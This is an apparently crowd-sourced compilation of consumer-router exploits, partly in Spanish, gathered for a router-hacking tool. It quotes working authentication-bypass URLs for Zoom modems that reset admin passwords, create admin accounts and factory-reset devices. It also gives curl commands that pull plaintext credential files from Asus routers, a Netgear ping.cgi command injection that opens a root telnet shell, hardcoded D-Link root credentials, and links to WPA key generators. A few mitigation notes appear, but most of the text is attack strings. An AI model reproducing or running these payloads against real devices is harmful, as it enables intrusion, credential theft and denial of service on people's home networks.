http://www.exploit-db.com/exploits/30415/

Vulnerable Products -

Zoom X4 ADSL Modem and Router running Nucleus/4.3
UPnP/1.0Virata-EmWeb/R6_2_0 Server All GS Firmware versions
Zoom X5 ADSL Modem and Router running Nucleus/4.3
UPnP/1.0Virata-EmWeb/R6_2_0 Server All GS Firmware versions

Note: A similar vulnerability was reported several years ago on the
Zoom X3 ADSL Modem using a SOAP API call. Many of these
vulnerabilities affect X3 in the same manner, without needing to use a
SOAP API.

Vulnerability-
When UPnP services and WAN http administrative access are enabled,
authorization and credential challenges can be bypassed by directly
accessing root privileged abilities via a web browser URL.

All aspects of the modem/router can be changed, altered and controlled
by an attacker, including gaining access to and changing the PPPoe/PPP
ISP credentials.

Timeline with Vendor-
Have had no response from Zoom Telephonics since first reporting the
problem on June 28. Subsequent emails have been sent with no response.

Root Cause Observed-
-As in most IGD UPnP routers and modems, where root vulnerabilities
are prevalent, these modems contain the same privileged tunnel between
either side of the router to be traversed without authentication. The
code and layout of the device plays a large role as well.

Code/Script Vulnerabilities-

-Form tags and actions ids usually hidden are easily seen from the
html source, no sanitization of client side input is occurring and
root overrides such as 'Zadv=1' can be invoked by any user.

-No cookie authentication is done once several of the first bypass is
executed, allowing for "Cookie: sessionId=invalid" to pass admin commands.

-The SQL injection UNION SELECT 1,2,3,4,5,6,7-- added to the end of
any URL page calling a table value, such as /MainPage?id=25, will
bring up the system status page, with each interface visible and
selectable.

Patches or Fixes-
At this time, there are no known patches or fixes.

Vulnerability proofs and examples-
All administrative items can be accessed through these two URLs

--Menu Banner
http:///hag/pages/toc.htm

-Advanced Options Menu
http:///hag/pages/toolbox.htm

Example commands that can be executed remotely through a web browser
URL, or a modified HTTP GET/POST requests-

-Change Password for admin Account

On Firmware 2.5 or lower
http:///hag/emweb/PopOutUserModify.htm/FormOne&user=admin&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes

On Firmware 3.0-
http:///hag/emweb/PopOutUserModify.htm?id=40&user=admin&Zadv=1&ex_param1=admin&new_pass1=123456&new_pass2=123456&id=3&cmdSubmit=Save+Changes

-Clear Logs
http:///Action?id=76&cmdClear+Log=Clear+Log

-Remote Reboot to Default Factory Settings-
Warning - For all intents and purposes, this action will almost always
result in a long term Denial of Service attack.
http:///Action?reboot_loc=1&id=5&cmdReboot=Reboot

-Create New Admin or Intermediate Account-
On Firmware 2.5 or lower
http:///hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes

On Firmware 3.0-
http:///hag/emweb/PopOutUserAdd.htm?id=70&Zadv=1&ex_param1=adminuser_id="newadminaccount"&priv=v1&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes

Mitigation and Workarounds-
Adv.Options --> UPnP --> --> Disable UPnP --> Write Settings to Flash --> Reboot
Adv.Options --> Firewall Configuration --> Enable 'Attack Protection'
'DOS Proctection''Black List'--> Write Settings to Flash
Adv.Options --> Management Control --> Disable WAN Management from all
fields --> Write Settings to Flash
Always change the default Username and Password, though this will
nothelp mitigate this vulnerability

http://packetstormsecurity.com/files/126219/dlinkdap1320-traversalxss.txt

http://www.exploit-db.com/exploits/24449/

GENERADOR ARCADYAN Routers (10 claves posibles)

EXPLOIT :
http://hwagm.elhacker.net/wlan4xx-generador-de-clave-wep-de-fabrica-para-redes-wlanxxxxxx/
http://www.seguridadwireless.net/archivos/wlan4xx-0.2.0.tar.gz

Creo que he visto el JS de los Alemanes, es practicamente el mismo. De
hecho , hablamos con ellos

GENERADOR COMTREND (clave directa)

FALLO :
http://foro.seguridadwireless.net/desarrollo-112/fallo-de-seguridad-en-routers-comtrend-full-disclosure/
EXPLOIT :
http://foro.seguridadwireless.net/aplicaciones-y-diccionarios-linux/wpamagickey-claves-por-defecto-wlan_xxxx-jazztel_xxxx-routers-comtrend-35300/

WPS Pin Belkin

FALLO : http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6371
http://ednolo.alumnos.upv.es/?p=1295

Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000
belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000
belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000

http://www.exploit-db.com/exploits/24786/

http://www.jakoblell.com/blog/2013/10/30/real-world-csrf-attack-hijacks-dns-server-configuration-of-tp-link-routers-2/

Hey!!!

No se que le pasa a routerpwn pero no jalan casi ninguno de los generadores como el Arris o el mac2wepkey se ha de haber ido una comilla o algo hay que depurarlo ya que casi nada sirve, ahorita restaure a la version que tenia anteriormente y tampoco jalo, modifica la ultima versión para que funcione bien.

URGENTE!

Saludos.

http://www.s3cur1ty.de/m1adv2013-019

"The admin interface of Router ZTE ZXHN H108N is vulnerable to authentication bypass. You need to add the string ""obj-action=auth"" to the end of any url of the admin
i.e.
https://x.x.x.x/cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wancfg&obj-action=auth"

hdanniel

http://1337day.com/exploit/20264

http://packetstormsecurity.com/files/98114/D-LINK-DIR-280-Direct-Access-Administrative-Password-Change.html

lo probó: https://twitter.com/Caribdiovich/status/424841556730720256

Las que se puedan agregar de

https://scotthelme.co.uk/ee-brightbox-router-hacked/

http://www.exploit-db.com/exploits/30362/

3/22/2014 19:08:58 no esta funcionando los key generator de thomson coyote [email protected]

http://www.exploit-db.com/exploits/5662/

http://www.s3cur1ty.de/m1adv2013-01

http://www.exploit-db.com/exploits/23361/

https://sintonen.fi/advisories/asus-router-auth-bypass.txt

Note: In June I released a partial disclosure for just the RT-N66U on
the issue of directory traversal. I have only heard back from ASUS a
twice on the issue, and I understand they are working on a fix.
However, no serious attempt to our knowledge has been made to warn
their customers in the meantime, even after multiple requests from
several different security professionals.

Nor has ASUS posted a disclosure of these serious issues to new
potential customers on their AiCloud web adverts, since they still
advertise the product as an add-on with these routers, as a safe and
bug free home cloud solution.

Linux 2.6.xx kernel

All firmware versions known

Vulnerable Asus Models

RT-AC66R Dual-Band Wireless-AC1750 Gigabit Router
RT-AC66U Dual-Band Wireless-AC1750 Gigabit Router
RT-N66R Dual-Band Wireless-N900 Gigabit Router with 4-Port Ethernet Switch
RT-N66U Dual-Band Wireless-N900 Gigabit Router
RT-AC56U Dual-Band Wireless-AC1200 Gigabit Router
RT-N56R Dual-Band Wireless-AC1200 Gigabit Router
RT-N56U Dual-Band Wireless-AC1200 Gigabit Router
RT-N14U Wireless-N300 Cloud Router
RT-N16 Wireless-N300 Gigabit Router
RT-N16R Wireless-N300 Gigabit Router

Vulnerabilities - Due in large part to an exposed $root share on the
NVRAM for Samba service, which was discovered in March of this year by
another researcher, on almost all of the above models that have
enabled AiCloud service, the end users will find themselves exposed to
multiple methods of attack and several dangerous remote exploits.

Since authentication can be simply bypassed on the those units running
HTTPS WebDav via directory traversal, access to all files which
control services on either side of the router are wide open to remote
manipulation. All pem and key files are also openly available.

Credentials-
Almost all models will disclose a clear text creational file, making
any MD5 hashing on the /etc/shadow file meaningless. This file below
remains easily accessible, and has no encryption. It may vary a bit in
where it sits on a small percentage of routers configured a certain
way.

(The -L and -v switches are optional)

curl -v https:///smb/tmp/$dir/lighttpd/permissions -k -L
or
curl -v https:///smb/tmp/lighttpd/permissions -k -L

PPTP Tunnel-
VPN service can be enabled, configured and connected by altering a
five small files on any of the four models of the RT66 series routers.
Everything needed to achieve this can be found in the directory at
/smb/tmp/$dir/pptpd, and the pptpctrl file as well as pptpd service
are in the /sbin dir.

Local executable or modifiable scripts-
The files needed to create a Dropbear ssh service can be found at
/smb/tmp/etc/dropbear/ with its pid sitting in /var. In /smb/tmp/bin
and /smb/tmp/sbin sit well over a dozen executables such as netcat,
ftpget, logger, wol, tr and sendmail. Several services, two of which
being /smb/sbin/vsftpd and /smb/sbin/telnetd can be configured or
altered there too. Other shell scripts, not native to the routers, can
be uploaded and used in an attack with little difficulty.

On the RT-N16 and N16R, once the https credentials are entered, an
attacker can easily move to the admin console on the LAN side by
changing the path to /index.asp. While the list of tools available to
an attacker might seem endless, there is no doubt that once the
AiCloud service is enabled, it would take just one person a few
minutes to completely control of all traffic coming in and out of the
LAN, gain access to all LAN side resources by a VPN or through another
service, and could choose to sniff packets, do a hard DoS or launch
attacks on other systems.

Mitigation and Workarounds-
Disable all UPnP services
Disable any and all of the three AiCloud items which will open the vulnerability
Remove any remote access to the router for administration until a patch is ready
Change the default username and password
If the AiCloud service is used, it would be advisable to change that
password if it was the same one used or the router

Hace un POST a la IP puerto 8080 a /goform/login con loginUsername=operator&loginPassword=cmoperator

http://foro.elhacker.net/hacking_wireless/keygen_para_routers_sitecomxxxxxx_wlr4000_y_wlr4004-t413421.0.html;msg1938223#msg1938223

http://www.exploit-db.com/exploits/28856/

https://www.youtube.com/watch?v=YeKswEamOl4&list=UUJ6q9Ie29ajGqKApbLqfBOg#t=747

http://www.websec.mx/advisories/view/Ejecuci%C3%B3n-de-comandos-en-Alcatel-Lucent-I-240W-Q

http://www.s3cur1ty.de/m1adv2013-002

http://www.exploit-db.com/exploits/29131/

Que tenga una interfaz tipo el del huawei. Que te permita descargar el archivo y luego lo subas para su decompresión. Puede ser php y que con ruby corra el codigo original hardeneado.

4/26/2014 23:43:52 "How about uPnP CSRF?

Netgear N300 DGN2200
according to http://www.baesystemsdetica.com.au/Research/Advisories/NETGEAR-DGN2200-Multiple-Vulnerabilities-(AIS-2014
http://osvdb.org/103230

Netgear WNDR3400v3
according to http://disconnected.io/2014/03/18/how-i-hacked-your-router/
Netgear DG384v5
(tested myself)

PoC taken from the BAE report

<input type=""submit"" >

Secondly the BAE report for DGN2200 also has a command injection / CSRF for the ping diagnostic page, which worked great on my DG834Gv5. (I just used the Firefox debugger's Net tab, with ""Edit and Resend""). I quote:

Example exploitation to obtain a file and directory listing:

POST /ping.cgi HTTP/1.1
Host: 192.168.0.1
Proxy-Connection: keep-alive
Content-Length: 81
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YXBwbGU3ODE=
Origin: http://192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://192.168.0.1/DIAG_diag.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|ls

To get an interactive shell,

1. Send the following POST data:
   IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|/usr/sbin/telnetd -p 90 -l /bin/sh
2. Telnet to port 90" Alan Jenkins [email protected]

http://www.s3cur1ty.de/advisories

Exploit Title: Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change)

Exploit Author: absane

Blog: http://blog.noobroot.com

Discovery date: October 29th 2013

Vendor Homepage: http://www.eunicorn.co.kr/kimsboard7/_product.php?inc=wb-3300nr

Tested on: Unicorn WB-3300NR v1.0

Firmware Version: V5.07.18_ko_UIS02

Vulnerability

The WB-3300NR Unicorn Router suffers from numerous CSRF vulnerabilities.
Considering that by default the administrative pages do not require authentication, countless exploits exist.

Proof of Concept

1. Factory Reset

2. Alter the DNS Settings

3. WPA Password Disclosure (possibility)(not proven)

The following PoC code only demostrates that with CSRF and XSS, it might be possible to obtain the WPA password.
However, I have been unable to do so without forcing the router to revert to factory defaults.

http://packetstormsecurity.com/files/126167

contribucion por tenex

http://www.exploit-db.com/exploits/23250/

http://www.s3cur1ty.de/m1adv2013-017

http://www.s3cur1ty.de/m1adv2013-018

http://www.exploit-db.com/exploits/25608/

http://seclists.org/fulldisclosure/2014/May/90

El DIR-514 A1 tiene el telnetd listening en el puerto 2300 y los credenciales son "root:amittima". Supongo que los developers no querian soldar los pads microscopicos de la UART...
Con un poquito de google encontre que otros dispositivos con chipsets Ralink tienen el mismo passwd...

Por otra parte el httpd cuenta con un alias no autenticado a "/", este esta en:
Código: [Seleccionar]
192.168.0.1/uir//
Este path equivalence es utilizado para accesar el:
Código: [Seleccionar]
192.168.0.1/uir//ram/www/rebo.htm

por flexlm

https://www.underground.org.mx/index.php?topic=29919.msg149786;topicseen#msg149786

Probar y agregar lo que dice en los siguientes twits:

https://twitter.com/rulobile/status/421922897926447104
https://twitter.com/rulobile/status/422075796102975488

@rulobile

http://www.exploit-db.com/exploits/25292/

http://www.s3cur1ty.de/m1adv2013-014

Creo que solo es agregar el modelo ya hay uno similar

http://www.exploit-db.com/exploits/18859/

https://bitbucket.org/dudux/belkin4xx/src/eb7545023f250589bfc2f944472964754a83f66d/belkin4xx.py?at=master

El generador de WPA de HG8245 requiere separador de octetos de MAC, modificarlo para aceptarlo de cualquier forma.

Mas info en https://www.underground.org.mx/index.php/topic,29590.0.html

Reportado por ah1n1 y SHAKA.

"DLink Authentication Bypass 11/09/10 also affect DLink DAP-2553
(in your list: DIR-615, DIR-320, DIR-300 Authentication Bypass)
(reference: http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf)

I also discover the possibility of read admin password by loading
http://192.168.0.1/tool_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0
(instead of http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0)
and change the input type of form element ""old_password"" from ""password"" to ""text""
The andmin password will be shown in plain text! ;-D"

Lorenzo Santina BigNerd95

Probar y agregar

http://www.websec.mx/advisories/view/Huawei-web-puerta-trasera-y-acceso-remoto

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb

http://www.websec.mx/advisories/view/tplink-wdr740-path-traversal

http://www.exploit-db.com/exploits/26415/

You skipped straight to the good stuff didn't you? That's cool. Here's the deal. If you browse to http:///BRS_02_genieHelp.html, you are allowed to bypass authentication for all pages in the entire administrative interface. But not only that, authentication remains disabled across reboots. And, of course if remote administration is turned on, this works from the frickin' Internet.

http://shadow-file.blogspot.mx/2013/10/complete-persistent-compromise-of.html

http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm

http://www.exploit-db.com/exploits/16857/